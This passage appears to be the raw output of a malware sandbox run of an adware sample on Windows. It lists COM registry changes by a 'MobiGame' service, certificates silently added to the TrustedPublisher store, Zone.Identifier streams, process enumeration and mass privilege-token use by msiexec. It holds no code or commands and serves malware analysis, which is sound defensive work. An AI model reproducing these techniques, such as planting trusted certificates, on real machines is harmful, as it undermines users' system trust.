Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5D035A0-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5A1EC90-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5DFA648-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5D2BFFA-F6C2-11E7-AEB4-080027376349}\TypeLib\Version = "1.3" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\https\DefaultIcon C:\Windows\servicing\TrustedInstaller.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5B766CE-F6C2-11E7-AEB4-080027376349}\TypeLib\ = "{C39F7A20-F6C2-11E7-AEB4-080027376349}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5CF9104-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5D83D68-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5809F54-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e1ec0a-f6c2-11e7-aeb4-080027376349}\ProgId C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C56D9116-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5BD4C42-F6C2-11E7-AEB4-080027376349}\TypeLib\Version = "1.3" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5D0CC36-F6C2-11E7-AEB4-080027376349}\ = "IUSBControllerChangedEvent" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5E0FE1C-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C555FED4-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C585CBDC-F6C2-11E7-AEB4-080027376349}\TypeLib\ = "{C39F7A20-F6C2-11E7-AEB4-080027376349}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C59D712E-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4E451BC-F6C2-11E7-AEB4-080027376349}\ = "IProgress" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5BA062C-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5CA4898-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5D83D68-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{c5e1ec0a-f6c2-11e7-aeb4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C3BF33A6-F6C2-11E7-AEB4-080027376349}\TypeLib C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C3C3C600-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4D0A748-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C46D71A0-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C5C4A118-F6C2-11E7-AEB4-080027376349} C:\Program Files\MobiGame\player\MobiVBoxSVC.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C4A6F0EC-F6C2-11E7-AEB4-080027376349}\ProxyStubClsid32 C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C58CEC78-F6C2-11E7-AEB4-080027376349} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ftp\shell\open\CommandId = "IE.Protocol" C:\Windows\servicing\TrustedInstaller.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\E74B8BC01BC843C34D710E29DE0411564BADC2F2 C:\Windows\system32\rundll32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\E74B8BC01BC843C34D710E29DE0411564BADC2F2\Blob = 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 C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4D56E7AC803733AEB63F6B8217F4BE35DFE6C42E C:\Windows\system32\rundll32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4D56E7AC803733AEB63F6B8217F4BE35DFE6C42E\Blob = [certificate blob omitted] C:\Windows\system32\rundll32.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\2023-11-23-05.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\2023-11-23-04.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
